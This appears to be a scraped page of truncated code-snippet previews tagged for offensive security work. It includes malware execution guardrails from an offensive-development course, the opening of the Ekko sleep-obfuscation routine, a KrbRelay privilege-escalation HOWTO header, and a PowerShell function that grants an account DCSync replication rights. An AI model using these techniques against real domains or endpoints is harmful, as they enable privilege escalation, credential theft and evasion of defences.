-
- #iot
- #chrome-and-friends: Chrome, V8, Blink, Mojo, etc.
- Linux kernel #todo
- expdev #todo
- fuzzing #todo
| #include <windows.h> | |
| #include <iostream> | |
| #include <sstream> | |
| std::string | |
| GetSymbolServerURL( | |
| const std::string& moduleName | |
| ) | |
| { | |
| /* Extract timestamp and image size from a module |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdbool.h> | |
| #include <windows.h> | |
| #include "nt_crap.h" | |
| #define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0])) | |
| #define assert(expr) if(!(expr)) { *(char*)0 = 0; } |
| # White Knight Labs - Offensive Development Course | |
| # Guardrails - Folder Check | |
| #include <windows.h> // Include Windows-specific headers for system calls | |
| #include <iostream> // Include for input and output stream operations | |
| #include <string> // Include for using string class | |
| #include <algorithm> // Include for standard algorithms, e.g., std::transform | |
| #include <cctype> // Include for character handling functions, e.g., std::tolower | |
| // Function to check if the path of the current executable is under a specified path |
| import poe, sys | |
| client = poe.Client("<POE_API_KEY_HERE>") | |
| title=sys.argv[1] | |
| path=sys.argv[2] | |
| more="" | |
| if len(sys.argv) > 3: | |
| more="\" and here is more information: "+sys.argv[3] | |
| message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
| #include <Core.h> | |
| #include <Win32.h> | |
| #include <Structs.h> | |
| #include <Sleep.h> | |
| #include <Utils.h> | |
| SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
| { |
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.
Prerequisites:
| function Invoke-SyncMeUp{ | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory=$True)] | |
| [string]$AccountName | |
| ) | |
| $dse = [ADSI]"LDAP://Rootdse" | |
| $namingcontext = $dse.defaultNamingContext | |
| echo "Giving $AccountName DCSync rights" | |
| dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes" |
| #include <ntddk.h> | |
| #define BLOCK_PROCESS "notepad.exe" | |
| static OB_CALLBACK_REGISTRATION obcallback_registration; | |
| static OB_OPERATION_REGISTRATION oboperation_callback; | |
| #define PROCESS_CREATE_THREAD (0x0002) | |
| #define PROCESS_CREATE_PROCESS (0x0080) | |
| #define PROCESS_TERMINATE (0x0001) | |
| #define PROCESS_VM_WRITE (0x0020) | |
| #define PROCESS_VM_READ (0x0010) | |
| #define PROCESS_VM_OPERATION (0x0008) |